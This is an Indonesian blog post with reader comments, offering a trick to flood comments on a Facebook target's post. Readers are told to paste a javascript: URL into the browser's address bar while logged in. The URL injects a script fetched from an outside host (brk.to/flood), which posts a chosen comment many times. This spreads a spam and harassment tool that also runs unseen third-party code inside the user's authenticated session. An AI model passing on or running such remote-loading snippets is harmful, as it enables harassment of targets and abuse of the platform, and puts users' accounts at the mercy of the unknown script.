-->

K.E ^_~ Yang lagi galau ini penawarnya link

Flood komentar di facebook

Cuman mau ngasih tau tentang cara ngeflood komentar di FB.
syaratnya :

1. harus udah login ke FB pastinya
2. target harus bisa dikomentarin, nggak harus friend yang penting bisa berkomentar.
3. posisi halaman yang kebuka.. cuman nongol 1 form komentar, kalo di wall kan form komentar bisa nongol banyak banget . misal di bagian foto, nah itu kan cuman ada 1 form komentar, berarti trik ini bisa dijalankan

stepnya :
1. copas script ini di url korban terus tekan [enter] di keyboard :

javascript(a = (b = document).createElement("script")).src = "//brk.to/flood",
b.body.appendChild(a); void(0);

2. masukkan jumlah komen
3. masukkan kalimat komentarnya
4. tunggu kira2 1-5 menit (tergantung jumlah komen + koneksi agan)
5. bisa dicek dengan refresh langsung atau buka tab baru.

Warning!!:ane nyoba dua kali langsung diblock dua hari ga bs koment.,xiixiixiixii
Update Artikel dari Grup Klikedukasi di Facebook:
Penulis Artikel ini:
Haviz Vaisal 
| Blogger, Facebook

comment 3 komentar

  1. gmn caranya brow??
    kurang jelas cara2nya itu

    BalasHapus
  2. Script yang diberikan dicopy dan paste pada Address bar. Saat tulisan ini dibuat masih bisa digunakan. Namun sepertinya sekarang sudah tidak bisa digunakan

    BalasHapus
  3. wahh..gk bisa gan..udh ane coba..kagak bisak..gimana law trik personal aja gan ad gak

    BalasHapus

Catatan:
Seluruh komentar yang masuk akan dimoderasi terlebih dahulu. Komentar yang berbau spam, kasar, menghina, seluruhnya yang bersifat menghancurkan bukan membangun tidak akan ditampilkan. Silahkan bertanya dan memberi pendapat dengan sopan dan sesuai aturan.

Anda diperbolehkan mempublikasikan ulang artikel ini, dengan syarat:
1. Mintalah izin dengan cara berkomentar di bawah artikel ini
2. Wajib menyertakan link ke artikel ini dan menyertakan nama penulis

 
© Klikedukasi 2008 - 2013 | Design by Panembahan Satyapradana | 170p3x